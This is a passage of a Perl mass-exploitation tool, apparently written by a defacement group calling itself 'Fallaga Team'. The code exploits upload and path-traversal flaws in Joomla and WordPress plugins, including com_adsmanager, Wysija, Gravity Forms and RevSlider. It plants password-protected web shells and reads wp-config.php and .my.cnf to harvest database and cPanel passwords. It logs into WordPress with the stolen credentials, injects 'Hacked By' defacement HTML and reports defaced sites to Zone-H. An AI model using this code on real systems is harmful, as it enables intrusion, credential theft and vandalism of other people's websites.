  841. $ua->timeout (20);
  842.  
  843. my $exploit = "$site/index.php?option=com_users&view=registration";
  844. my $checkk = $ua->get("$exploit")->content;
  845. if($checkk =~/jform_email2-lbl/) {
  846. print" ............. ";
  847. print color('bold white');
  848. print "[";
  849. print color('reset');
  850. print color('bold green');
  851. print "VULN";
  852. print color('reset');
  853. print color('bold white');
  854. print "] \n";
  855. print color('reset');
  856. open(save, '>>Result/vulntargets.txt');
  857. print save "[users] $site\n";
  858. close(save);
  859.  
  860. }else{
  861. print" ......... ";
  862. print color('bold white');
  863. print "[";
  864. print color('reset');
  865. print color('bold red');
  866. print "NOT VULN";
  867. print color('reset');
  868. print color('bold white');
  869. print "] \n";
  870. print color('reset');
  871. }
  872. }
  873.  
  874. ####################################################################################################
  875. ####################################################################################################
  876. ########################################## COM ADS ANAGER ##########################################
  877. ####################################################################################################
  878. ####################################################################################################
  879. sub comadsmanegr(){
  880. print colored ("[COM ADS MANAGER]",'white on_red');
  881. my $path = "/index.php?option=com_adsmanager&task=upload&tmpl=component";
  882. if($site !~ /http:\/\//) { $target = "http://$site/"; };
  883. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  884. $ua->timeout(10);
  885. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  886. my $exploit = $ua->post("$site/$path", Cookie => "", Content_Type => "form-data", Content => [file => ["def.jpg"], name => "xGassx.html"]);
  887. if ($exploit->decoded_content =~ /xGassx.html/) {
  888. print " .............. [VULN]\n";
  889. open(save, '>>Result/vulntargets.txt');
  890. print save "[ads] $site\n";
  891. close(save);
  892.  
  893. print "[UPLOAD INDEX] ................... ";
  894. print color('bold white');
  895. print "[";
  896. print color('reset');
  897. print color('bold green');
  898. print "OK";
  899. print color('reset');
  900. print color('bold white');
  901. print "] \n";
  902. print color('reset');
  903.  
  904. $def="$site/tmp/plupload/xGassx.html";
  905. my $checkdef = $ua->get("$def")->content;
  906. if($checkdef =~/Hacked|Defaced|Fallag|Gassrini/) {
  907. print "[DEFACE] .................... ";
  908. print color('bold white');
  909. print "[";
  910. print color('reset');
  911. print color('bold green');
  912. print "SUCCESS";
  913. print color('reset');
  914. print color('bold white');
  915. print "] \n";
  916. print color('reset');
  917. print "[INDEX LINK] => $def\n";
  918. zoneh();
  919. mirrorzon();
  920. adshell();
  921. }
  922. }else{print " .......... ";
  923. print color('bold white');
  924. print "[";
  925. print color('reset');
  926. print color('bold red');
  927. print "NOT VULN";
  928. print color('reset');
  929. print color('bold white');
  930. print "] \n";
  931. print color('reset');
  932. }
  933. }
  934.  
  935.  
  936.  
  937.  
  938. sub adshell(){
  939.  
  940. print "[UPLOAD SHELL] ................... ";
  941. my $path = "/index.php?option=com_adsmanager&task=upload&tmpl=component";
  942. my $exploitxx = $ua->post("$site/$path", Cookie => "", Content_Type => "form-data", Content => [file => ["loader.jpg"], name => "xGassrinix.php"]);
  943. if ($exploitxx->decoded_content =~ /xGassrinix.php/) {
  944. print color('bold white');
  945. print "[";
  946. print color('reset');
  947. print color('bold green');
  948. print "OK";
  949. print color('reset');
  950. print color('bold white');
  951. print "] \n";
  952. print color('reset');
  953. print "[SCANING SHELL] ................ ";
  954. print color('bold white');
  955. print "[";
  956. print color('reset');
  957. print color('bold blue');
  958. print "WAIT";
  959. print color('reset');
  960. print color('bold white');
  961. print "] \n";
  962. print color('reset');
  963.  
  964. my $check = $ua->get("$site/tmp/plupload/xGassrinix.php")->content;
  965. my $checkk = $ua->get("$site/xGSx.php")->content;
  966. if($checkk =~/<form method=post>Password: <input type=password name=pass><input type=submit value=/) {
  967. print "[SHELL] ......................";
  968. print color('bold white');
  969. print "[";
  970. print color('reset');
  971. print color('bold green');
  972. print "SUCCESS";
  973. print color('reset');
  974. print color('bold white');
  975. print "] \n";
  976. print color('reset');
  977. print "[SHELL LINK] => $site/xGSx.php\n";
  978. open(save, '>>Result/shells.txt');
  979. print save "[ADS] $site/xGSx.php\n";
  980. close(save);
  981. my $checkjo = $ua->get("$site/un.php")->content;
  982. if($checkjo =~ /path:(.*)<b><br>uname:(.*)<br><\/b>fallagateam/){
  983. print "\n";
  984. print colored ("[PATH] : $1",'black on_yellow'),"\n\n";
  985. print colored ("[KERNEL]:$2",'black on_yellow'),"\n";
  986. print "\n";
  987. open(save, '>>Result/shells.txt');
  988.  
  989. print save "Path : $1\nKernel:$2\n";
  990.  
  991. close(save);
  992. }
  993. }else{
  994. print "[SHELL] ........................";
  995. print color('bold white');
  996. print "[";
  997. print color('reset');
  998. print color('bold green');
  999. print "ERROR";
  1000. print color('reset');
  1001. print color('bold white');
  1002. print "] \n";
  1003. print color('reset');
  1004. }
  1005.  
  1006. }
  1007. }
  1008. ####################################################################################################
  1009. ####################################################################################################
  1010. ############################# COM BLOG SCANNER ##################################################
  1011. ####################################################################################################
  1012. ####################################################################################################
  1013. sub comblog(){
  1014. print colored ("[COM BLOG SCANNER]",'white on_red');
  1015.  
  1016.  
  1017. $uaa = LWP::UserAgent->new(keep_alive => 1);
  1018. $uaa->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  1019. $uaa->timeout (10);
  1020.  
  1021. my $exploitblog = "$site/index.php?option=com_myblog&task=ajaxupload";
  1022. my $checkblog = $uaa->get("$exploitblog")->content;
  1023. if($checkblog =~/has been uploaded/) {
  1024. print" ............. ";
  1025. print color('bold white');
  1026. print "[";
  1027. print color('reset');
  1028. print color('bold green');
  1029. print "VULN";
  1030. print color('reset');
  1031. print color('bold white');
  1032. print "] \n";
  1033. print color('reset');
  1034. open(save, '>>Result/vulntargets.txt');
  1035. print save "[blog] $site\n";
  1036. close(save);
  1037.  
  1038. print "[ $site EXPLOIT IT MANUEL ]\n";
  1039. }
  1040. else {print " ......... ";
  1041. print color('bold white');
  1042. print "[";
  1043. print color('reset');
  1044. print color('bold red');
  1045. print "NOT VULN";
  1046. print color('reset');
  1047. print color('bold white');
  1048. print "] \n";
  1049. print color('reset');
  1050.  
  1051. }
  1052. }
  1053.  
  1054. ####################################################################################################
  1055. ####################################################################################################
  1056. ####################################################################################################
  1057. ####################################################################################################
  1058. ####################################################################################################
  1059. ####################################################################################################
  1060. ###################################### WORDPRESS #####################################
  1061. ####################################################################################################
  1062. ####################################################################################################
  1063. ####################################################################################################
  1064. ####################################################################################################
  1065. ####################################################################################################
  1066. ####################################################################################################
  1067. ############################################wysija #################################################
  1068. ####################################################################################################
  1069. sub wysija(){
  1070. print colored("[WYSIJA]",'white on_red');
  1071.  
  1072. $zokometheme = "my-theme";
  1073. my $path = "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes";
  1074. if($site !~ /http:\/\//) { $site = "http://$site/"; };
  1075. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  1076. $ua->timeout(10);
  1077. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  1078.  
  1079.  
  1080. my $exploit = $ua->post("$site/$path", Content_Type => 'form-data', Content => [ $zokometheme => ['gassrini.zip', => 'gassrini.zip'], overwriteexistingtheme => "on",action => "themeupload", submitter => "Upload",]);
  1081.  
  1082. my $check = $ua->get("$site/wp-content/uploads/wysija/themes/Gassrini/herewgo.php")->content;
  1083. my $checkk = $ua->get("$site/xGSx.php")->content;
  1084. if($checkk =~/<form method=post>Password: <input type=password name=pass><input type=submit value=/) {
  1085. open(save, '>>Result/vulntargets.txt');
  1086. print save "[wysija] $site\n";
  1087. close(save);
  1088. print" ........................ ";
  1089. print color('bold white');
  1090. print "[";
  1091. print color('reset');
  1092. print color('bold green');
  1093. print "OK";
  1094. print color('reset');
  1095. print color('bold white');
  1096. print "] \n";
  1097. print color('reset');
  1098.  
  1099. print "[UPLOADING SHELL] ...........";
  1100.  
  1101. print color('bold white');
  1102. print "[";
  1103. print color('reset');
  1104. print color('bold green');
  1105. print "SUCCESS";
  1106. print color('reset');
  1107. print color('bold white');
  1108. print "] \n";
  1109. print color('reset');
  1110. print "[SHELL LINK] => $site/xGSx.php\n";
  1111. open(save, '>>Result/shells.txt');
  1112. print save "[WYSIJA] $site/xGSx.php\n";
  1113. close(save);
  1114. my $checkgasss = $ua->get("$site/un.php")->content;
  1115. if($checkgasss =~ /path:(.*)<b><br>uname:(.*)<br><\/b>fallagateam/){
  1116. print "\n";
  1117. print colored ("[PATH] : $1",'black on_yellow'),"\n\n";
  1118. print colored ("[KERNEL]:$2",'black on_yellow'),"\n";
  1119. print "\n";
  1120. open(save, '>>Result/shells.txt');
  1121.  
  1122. print save "Path : $1\nKernel:$2\n";
  1123.  
  1124. close(save);
  1125. }
  1126. $def="$site/Gass.html";
  1127. my $fuckingcheck = $ua->get("$def")->content;
  1128. if($fuckingcheck =~m/Fallag|Hacked/i) {
  1129. zoneh();
  1130. mirrorzon();
  1131. }
  1132.  
  1133.  
  1134.  
  1135.  
  1136. }else {
  1137. print" ...................... ";
  1138.  
  1139. print color('bold white');
  1140. print "[";
  1141. print color('reset');
  1142. print color('bold RED');
  1143. print "ERROR";
  1144. print color('reset');
  1145. print color('bold white');
  1146. print "] \n";
  1147. print color('reset');
  1148. }
  1149. }
  1150. ####################################################################################################
  1151. ####################################################################################################
  1152. ######################################## GRAVITY FORMS #########################################
  1153. ####################################################################################################
  1154. ####################################################################################################
  1155.  
  1156. sub gravity(){
  1157. print colored ("[GRAVITY FORMS]",'white on_red');
  1158. my $path = "/?gf_page=upload";
  1159. if($site !~ /http:\/\//) { $site = "http://$site/"; };
  1160. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  1161. $ua->timeout(10);
  1162. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  1163. my $exploitgrav = $ua->post("$site/$path", Cookie => "", Content_Type => "form-data", Content => [file => ["Gass.jpg"], field_id => "3", form_id => "1",gform_unique_id => "../../../../../", name => "Gass.php5"]);
  1164. if ($exploitgrav->decoded_content =~ /_input_3_Gass.php5/) {
  1165. print " ................ ";
  1166. print color('bold white');
  1167. print "[";
  1168. print color('reset');
  1169. print color('bold green');
  1170. print "VULN";
  1171. print color('reset');
  1172. print color('bold white');
  1173. print "] \n";
  1174. print color('reset');
  1175. open(save, '>>Result/vulntargets.txt');
  1176. print save "[gravi] $site\n";
  1177. close(save);
  1178.  
  1179. print "[SCANING SHELL] ............ ";
  1180. open(save, '>>Result/libs.txt');
  1181. print save "$site/_input_3_Gass.php5\n";
  1182. close(save);
  1183. my $checkgrav = $ua->get("$site/_input_3_Gass.php5")->content;
  1184. my $checkkgrav = $ua->get("$site/xGSx.php")->content;
  1185. if($checkkgrav =~/<form method=post>Password: <input type=password name=pass><input type=submit value=/) {
  1186. print color('bold white');
  1187. print "[";
  1188. print color('reset');
  1189. print color('bold green');
  1190. print "UPLODED";
  1191. print color('reset');
  1192. print color('bold white');
  1193. print "] \n";
  1194. print color('reset');
  1195. print "[SHELL LINK] => $site/xGSx.php \n";
  1196. open(save, '>>Result/shells.txt');
  1197. print save "[GRAVITY] $site/xGSx.php\n";
  1198. close(save);
  1199.  
  1200. # get uname and path on server
  1201. my $checkgasss = $ua->get("$site/un.php")->content;
  1202. if($checkgasss =~ /path:(.*)<b><br>uname:(.*)<br><\/b>fallagateam/){
  1203. print "\n";
  1204. print colored ("[PATH] : $1",'black on_yellow'),"\n\n";
  1205. print colored ("[KERNEL]:$2",'black on_yellow'),"\n";
  1206. print "\n";
  1207. open(save, '>>Result/shells.txt');
  1208. print save "Path : $1\nKernel:$2\n";
  1209. close(save);
  1210. $def="$site/Gass.html";
  1211. zoneh();
  1212. mirrorzon();
  1213. }
  1214. #### get info Done ..////
  1215.  
  1216.  
  1217.  
  1218. }else{
  1219.  
  1220. print color('bold white');
  1221. print "[";
  1222. print color('reset');
  1223. print color('bold red');
  1224. print "ERROR!!";
  1225. print color('reset');
  1226. print color('bold white');
  1227. print "] \n";
  1228. print color('reset');
  1229. upindex();
  1230.  
  1231.  
  1232.  
  1233. }
  1234.  
  1235.  
  1236.  
  1237.  
  1238.  
  1239. }else{ print " ............ ";
  1240. print color('bold white');
  1241. print "[";
  1242. print color('reset');
  1243. print color('bold red');
  1244. print "NOT VULN";
  1245. print color('reset');
  1246. print color('bold white');
  1247. print "] \n";
  1248. print color('reset');
  1249. }
  1250. }
  1251.  
  1252. sub upindex{
  1253. my $path = "/?gf_page=upload";
  1254. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  1255. $ua->timeout(10);
  1256. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  1257. my $indexploit = $ua->post("$site/$path", Cookie => "", Content_Type => "form-data", Content => [file => ["def.jpg"], field_id => "3", form_id => "1",gform_unique_id => "../../../../../", name => "Gass.html"]);
  1258. print "[DEFACE] ....................";
  1259. if ($indexploit->decoded_content =~ /_input_3_Gass.html/) {
  1260. $def= $site . '_input_3_Gass.html';
  1261. print color('bold white');
  1262. print " [";
  1263. print color('reset');
  1264. print color('bold green');
  1265. print "SUCCESS";
  1266. print color('reset');
  1267. print color('bold white');
  1268. print "] ";
  1269. print color('reset');
  1270. print"\n";
  1271. print colored ("[INDEX LINK] => $def ",'black on_red'),"\n";
  1272. zoneh();
  1273. mirrorzon();
  1274. }else{
  1275. print ".. [ERROR]\n";
  1276. }
  1277. }
  1278. ####################################################################################################
  1279. ####################################################################################################
  1280. ##################################### REVSLIDER ########################################
  1281. ####################################################################################################
  1282. ####################################################################################################
  1283. sub getconfig{
  1284. print colored ("[REVSLIDER GETCONFIG]",'white on_red');
  1285. $ua = LWP::UserAgent->new(keep_alive => 1);
  1286. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  1287. $ua->timeout (10);
  1288. $config = "wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php";
  1289. $conflink = "$site/$config";
  1290. $resp = $ua->request(HTTP::Request->new(GET => $conflink ));
  1291. $conttt = $resp->content;
  1292. if($conttt =~ m/DB_NAME/g){
  1293. print " .......... ";
  1294. print color('bold white');
  1295. print "[";
  1296. print color('reset');
  1297. print color('bold green');
  1298. print "VULN";
  1299. print color('reset');
  1300. print color('bold white');
  1301. print "] \n";
  1302. print color('reset');
  1303. open(save, '>>Result/vulntargets.txt');
  1304. print save "[rev cnfg] $site\n";
  1305. close(save);
  1306. $resp = $ua->request(HTTP::Request->new(GET => $conflink ));
  1307. $cont = $resp->content;
  1308. while($cont =~ m/DB_NAME/g){
  1309.  
  1310.  
  1311. if ($cont =~ /DB_NAME\', \'(.*)\'\)/){
  1312. print color("red"),"\t[-]Database Name = $1 \n";
  1313. print color 'reset';
  1314. open (TEXT, '>>Result/databases.txt');
  1315. print TEXT "\n[ DATABASE ] \n$site\n[-]Database Name = $1";
  1316. close (TEXT);
  1317. }
  1318. if ($cont =~ /DB_USER\', \'(.*)\'\)/){
  1319. print color("white"),"\t[-]Database User = $1 \n";
  1320. print color 'reset';
  1321. open (TEXT, '>>Result/databases.txt');
  1322. print TEXT "\n[-]Database User = $1";
  1323. close (TEXT)
  1324. }
  1325. if ($cont =~ /DB_PASSWORD\', \'(.*)\'\)/){
  1326. print color("red"),"\t[-]Database Password = $1 \n";
  1327. print color 'reset';
  1328. $pass= $1 ;
  1329. open (TEXT, '>>Result/databases.txt');
  1330. print TEXT "\nDatabase Password = $pass";
  1331. close (TEXT)
  1332. }
  1333. if ($cont =~ /DB_HOST\', \'(.*)\'\)/){
  1334. print color("white"),"\t[-]Database Host = $1 \n\n";
  1335. print color 'reset';
  1336. open (TEXT, '>>Result/databases.txt');
  1337. print TEXT "\n[-]Database Host = $1";
  1338. close (TEXT)
  1339. }
  1340.  
  1341. wpbrute();
  1342. getcpconfig();
  1343. }}else{
  1344. print " ...... ";
  1345. print color('bold white');
  1346. print "[";
  1347. print color('reset');
  1348. print color('bold red');
  1349. print "NOT VULN";
  1350. print color('reset');
  1351. print color('bold white');
  1352. print "] \n";
  1353. print color('reset');
  1354. getcpconfig();
  1355.  
  1356. }
  1357.  
  1358. }
  1359.  
  1360. ####################################################################################################
  1361. ####################################################################################################
  1362.  
  1363. sub getcpconfig{
  1364. print colored ("[REVSLIDER GET CPANEL]",'white on_red');
  1365. $ua = LWP::UserAgent->new(keep_alive => 1);
  1366. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  1367. $ua->timeout (10);
  1368. $cpup = "wp-admin/admin-ajax.php?action=revslider_show_image&img=../../.my.cnf";
  1369. $cpuplink = "$site/$cpup";
  1370. $resp = $ua->request(HTTP::Request->new(GET => $cpuplink ));
  1371. $cont = $resp->content;
  1372. if($cont =~ m/user=/g){
  1373. print " ...... ";
  1374. print color('bold white');
  1375. print "[";
  1376. print color('reset');
  1377. print color('bold green');
  1378. print "FOUNDED";
  1379. print color('reset');
  1380. print color('bold white');
  1381. print "] \n";
  1382. print color('reset');
  1383. open(save, '>>Result/vulntargets.txt');
  1384. print save "[rev cpnl] $site\n";
  1385. close(save);
  1386. $resp = $ua->request(HTTP::Request->new(GET => $cpuplink ));
  1387. $contt = $resp->content;
  1388. while($contt =~ m/user/g){
  1389. if ($contt =~ /user=(.*)/){
  1390.  
  1391. print color("red"),"\n\t[-]Cpanel User = $1 \n";
  1392. print color 'reset';
  1393. open (TEXT, '>>Result/cpanels.txt');
  1394. print TEXT "\n[ cpanel ] \n$site\n[-]cpanel user = $1";
  1395. close (TEXT);
  1396. }
  1397. if ($contt =~ /password="(.*)"/){
  1398. print color("white"),"\t[-]Cpanel Pass = $1 \n\n";
  1399. print color 'reset';
  1400. open (TEXT, '>>Result/cpanels.txt');
  1401. print TEXT "\n[-]Cpanel Pass = $1";
  1402. close (TEXT)
  1403. }
  1404.  
  1405.  
  1406. }
  1407. }else{print " .. ";
  1408. print color('bold white');
  1409. print "[";
  1410. print color('reset');
  1411. print color('bold red');
  1412. print "NOT FOUNDED";
  1413. print color('reset');
  1414. print color('bold white');
  1415. print "] \n";
  1416. print color('reset');
  1417. }
  1418.  
  1419.  
  1420. }
  1421.  
  1422.  
  1423.  
  1424.  
  1425. ####################################################################################################
  1426. ####################################################################################################
  1427. ####################################################################################################
  1428. sub revdef(){
  1429. print colored ("[DEFACE AJAX]",'white on_red');
  1430.  
  1431. $ajx = $site . 'wp-admin/admin-ajax.php';
  1432.  
  1433. $def = $site .'wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css';
  1434.  
  1435. $gassface = POST $ajx, ['action' => 'revslider_ajax_action', 'client_action' => 'update_captions_css', 'data' =>"<body style='color: transparent;background-color: black'><center><h1><b style='color: white'><center><b>Hacked By Fallag Gassrini</b><br>Fallaga Team<p style='color: transparent'>"];
  1436. $response = $ua->request($gassface);
  1437. $stat = $response->content;
  1438. if ($stat =~ /true/){
  1439. print " ............... ";
  1440. print color('bold white');
  1441. print "[";
  1442. print color('reset');
  1443. print color('bold green');
  1444. print "SUCCESS";
  1445. print color('reset');
  1446. print color('bold white');
  1447. print "] \n";
  1448. print color('reset');
  1449.  
  1450.  
  1451. my $checkajx= $ua->get("$def")->content;
  1452. if($checkajx =~/Hacked|Fallaga|Gassrini/) {
  1453.  
  1454. open(save, '>>Result/vulntargets.txt');
  1455. print save "[rev deface] $site\n";
  1456. close(save);
  1457.  
  1458. print "[DEFACE] .................... ";
  1459. print color('bold white');
  1460. print "[";
  1461. print color('reset');
  1462. print color('bold green');
  1463. print "SUCCESS";
  1464. print color('reset');
  1465. print color('bold white');
  1466. print "] \n";
  1467. print color('reset');
  1468.  
  1469. print "[LINK INDEX] .................. ";
  1470. print color('bold white');
  1471. print "[";
  1472. print color('reset');
  1473. print color('bold green');
  1474. print "SAVED";
  1475. print color('reset');
  1476. print color('bold white');
  1477. print "] \n";
  1478. print color('reset');
  1479.  
  1480. zoneh();
  1481. mirrorzon();
  1482. }
  1483. }else{
  1484. print " ................. \n";
  1485. print color('bold white');
  1486. print "[";
  1487. print color('reset');
  1488. print color('bold green');
  1489. print "ERROR";
  1490. print color('reset');
  1491. print color('bold white');
  1492. print "] \n";
  1493. print color('reset');
  1494.  
  1495. }
  1496. }
  1497. ####################################################################################################
  1498. ####################################################################################################
  1499. ############################### PHP MY ADMIN SCANNER ##############################################
  1500. ####################################################################################################
  1501. ####################################################################################################
  1502. sub zebbi{
  1503. print colored ("[PMA SCANNER]",'white on_red');
  1504. print " .................. ";
  1505. print color('bold white');
  1506. print "[";
  1507. print color('reset');
  1508. print color('bold blue');
  1509. print "WAIT";
  1510. print color('reset');
  1511. print color('bold white');
  1512. print "] \n";
  1513. print color('reset');
  1514. use HTTP::Request;
  1515. use LWP::UserAgent;
  1516. @pat=('/phpMyAdmin/','/phpmyadmin/');
  1517. foreach $pma(@pat){
  1518. chomp $pma;
  1519.  
  1520. $url = $site.$pma;
  1521. $req = HTTP::Request->new(GET=>$url);
  1522. $userAgent = LWP::UserAgent->new();
  1523. $response = $userAgent->request($req);
  1524. $ar = $response->content;
  1525. if ($ar =~ m/Welcome to phpMyAdmin|Username|Password/g){
  1526. print "[$pma] .............. ";
  1527. print color('bold white');
  1528. print "[";
  1529. print color('reset');
  1530. print color('bold green');
  1531. print "FOUNDED";
  1532. print color('reset');
  1533. print color('bold white');
  1534. print "] \n";
  1535. print color('reset');
  1536. open (TEXT, '>>Result/databases.txt');
  1537. print TEXT "\n[PhpMyAdmin]$url => PMA Founded !!\n\n";
  1538. close (TEXT);
  1539.  
  1540. }else{
  1541.  
  1542. print "[$pma] .......... ";
  1543. print color('bold white');
  1544. print "[";
  1545. print color('reset');
  1546. print color('bold red');
  1547. print "NOT FOUNDED";
  1548. print color('reset');
  1549. print color('bold white');
  1550. print "] \n";
  1551. print color('reset');
  1552.  
  1553. }}
  1554. print "[PMA SCAN] ..................... ";
  1555. print color('bold white');
  1556. print "[";
  1557. print color('reset');
  1558. print color('bold blue');
  1559. print "DONE";
  1560. print color('reset');
  1561. print color('bold white');
  1562. print "] \n";
  1563. print color('reset');
  1564. revdef();
  1565.  
  1566. }
  1567. ####################################################################################################
  1568. ####################################################################################################
  1569. ####################################### WORDPRESS BRUTE ############################################
  1570. ####################################################################################################
  1571. ####################################################################################################
  1572. sub wpbrute{
  1573. print colored ("[BRUTE WITH CONFIG PASS]",'white on_red');
  1574. $red = $site . '/wp-admin/';
  1575. $wp= $site . 'wp-login.php';
  1576. $admin = "admin";
  1577. print " ....... ";
  1578. print color('bold white');
  1579. print "[";
  1580. print color('reset');
  1581. print color('bold blue');
  1582. print "WAIT";
  1583. print color('reset');
  1584. print color('bold white');
  1585. print "] \n";
  1586. print color('reset');
  1587.  
  1588. print "[INFO] USER : $admin\n[INFO] PASSWORD : $pass\n";
  1589. $brute = POST $wp, [log => $admin, pwd => $pass, wp-submit => 'Log In', redirect_to => $red];
  1590. $response = $ua->request($brute);
  1591. $stat = $response->status_line;
  1592. if ($stat =~ /302/){
  1593. print "[BRUTE] ............... ";
  1594. print color('bold white');
  1595. print "[";
  1596. print color('reset');
  1597. print color('bold green');
  1598. print "LOGIN SUCCESS";
  1599. print color('reset');
  1600. print color('bold white');
  1601. print "] \n";
  1602. open (TEXT, '>>Result/brute.txt');
  1603. print TEXT "\n[BRUTE][BOOM] $site/wp-login.php => User :$admin Password:$pass\n";
  1604. close (TEXT);
  1605. }else{
  1606. print "[BRUTE]..";
  1607. print color('bold white');
  1608. print "[";
  1609. print color('reset');
  1610. print color('bold red');
  1611. print "USER AND PASSWORD DONT MATCH";
  1612. print color('reset');
  1613. print color('bold white');
  1614. print "] \n";
  1615. print color('reset');
  1616.  
  1617. }
  1618. zebbi();
  1619. }
  1620. ####################################################################################################
  1621. ####################################################################################################
  1622. ################################## REVSLIDER SHELL #########################################
  1623. ####################################################################################################
  1624. ####################################################################################################
  1625. sub revshell(){
  1626. print colored ("[REVSLIDER SHELL]",'white on_red');
  1627. if($site !~ /http:\/\//) { $site = "http://$site/"; };
  1628. my $zip = "revslider.zip";
  1629. my $action;
  1630. my $update_file;
  1631. $action = "revslider_ajax_action";
  1632. $update_file = "$zip";
  1633. my $targd = "wp-admin/admin-ajax.php";
  1634. my $herwgo = "$site/wp-content/plugins/revslider/temp/update_extract/revslider/herewgo.php";
  1635.  
  1636. sub randomagent {
  1637. my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  1638. 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
  1639. 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  1640. 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
  1641. 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
  1642. 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
  1643. );
  1644. my $random = $array[rand @array];
  1645. return($random);
  1646. }
  1647. my $useragent = randomagent();
  1648.  
  1649. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  1650. $ua->timeout(10);
  1651. $ua->agent($useragent);
  1652. my $exploit = $ua->post("$site/$targd", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);
  1653. if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
  1654. print " .............. ";
  1655. print color('bold white');
  1656. print "[";
  1657. print color('reset');
  1658. print color('bold green');
  1659. print "VULN";
  1660. print color('reset');
  1661. print color('bold white');
  1662. print "] \n";
  1663. print color('reset');
  1664. print "[UPLOAD SHELL]";
  1665. my $exploitrevshell = $ua->get("$herwgo")->content;
  1666. my $exploitrevshellz = $ua->get("$site/xGSx.php")->content;
  1667. if($exploitrevshellz =~/<form method=post>Password: <input type=password name=pass><input type=submit value=/) {
  1668. print " ................... ";
  1669. print color('bold white');
  1670. print "[";
  1671. print color('reset');
  1672. print color('bold green');
  1673. print "OK";
  1674. print color('reset');
  1675. print color('bold white');
  1676. print "] \n";
  1677. print color('reset');
  1678. print "[SHELL LINK] => $site/xGSx.php\n";
  1679. open(save, '>>Result/shells.txt');
  1680. print save "[REVSLIDER] $site/xGSx.php\n";
  1681. close(save);
  1682. my $checkun = $ua->get("$site/un.php")->content;
  1683. if($checkun =~ /path:(.*)<b><br>uname:(.*)<br><\/b>fallagateam/){
  1684. print "\n";
  1685. print colored ("Path : $1",'black on_yellow'),"\n\n";
  1686.  
  1687. print colored ("Kernel:$2",'black on_yellow'),"\n";
  1688. open(save, '>>Result/shells.txt');
  1689. print save "Path : $1\nKernel:$2\n";
  1690. close(save);
  1691. $def="$site/Gass.html";
  1692. print "[INDEX LINK] => $def \n";
  1693.  
  1694. zoneh();
  1695. mirrorzon();
  1696. }
  1697. }else{
  1698. print " ................ ";
  1699. print color('bold white');
  1700. print "[";
  1701. print color('reset');
  1702. print color('bold red');
  1703. print "ERROR";
  1704. print color('reset');
  1705. print color('bold white');
  1706. print "] \n";
  1707. print color('reset');
  1708. getconfig();
  1709. }
  1710. }
  1711. else {
  1712. print " .......... ";
  1713. print color('bold white');
  1714. print "[";
  1715. print color('reset');
  1716. print color('bold red');
  1717. print "NOT VULN";
  1718. print color('reset');
  1719. print color('bold white');
  1720. print "] \n";
  1721. print color('reset');
  1722.  
  1723. getconfig();
  1724. }
  1725. }
  1726.  
  1727. ####################################################################################################
  1728. ####################################################################################################
  1729. ###################################### zone h poster #######################################
  1730. ####################################################################################################
  1731. ####################################################################################################
  1732. sub zoneh(){
  1733. # // this to post all our deface on zone-h //
  1734. print colored ("[ZONE-H]",'black on_yellow');
  1735. open(save, '>>Result/index.txt');
  1736. print save "$def\n";
  1737. close(save);
  1738.  
  1739. $hack=""; # chaneg Fallaga Team by Your zone h name :p - thats not recode lamerz lol ..//
  1740. $zn="";
  1741. $lwp=LWP::UserAgent->new;
  1742. $res=$lwp -> post($zn,[
  1743. 'defacer' => $hack,
  1744. 'domain1' => $def,
  1745. 'hackmode' => '15',
  1746. 'reason' => '1',
  1747. 'submit' => 'Send',
  1748. ]);
  1749. if ($res->content =~ /color="red">ERROR<\/font><\/li>/) {
  1750. print " ...................... ";
  1751. print color('bold white');
  1752. print "[";
  1753. print color('reset');
  1754. print color('bold red');
  1755. print "ERROR";
  1756. print color('reset');
  1757. print color('bold white');
  1758. print "] \n";
  1759. print color('reset');
  1760.  
  1761. }
  1762. elsif ($res->content =~ /color="red">OK<\/font><\/li>/) {
  1763. print " ......................... ";
  1764. print color('bold white');
  1765. print "[";
  1766. print color('reset');
  1767. print color('bold green');
  1768. print "OK";
  1769. print color('reset');
  1770. print color('bold white');
  1771. print "] \n";
  1772. print color('reset');
  1773.  
  1774.  
  1775. }
  1776. else
  1777. {
  1778. print colored ("[ERROR !]Error Can't Submit it On Zone-h Gass",'white on_red'),"\n";
  1779.  
  1780. }
  1781. }
  1782. ####################################################################################################
  1783. ####################################################################################################
  1784. ##################################### Mirror zone poster #######################################
  1785. ####################################################################################################
  1786. ####################################################################################################
  1787. sub mirrorzon(){
  1788. # for mirror zone post xD
  1789. print colored ("[MIRROR-ZONE]",'black on_yellow');
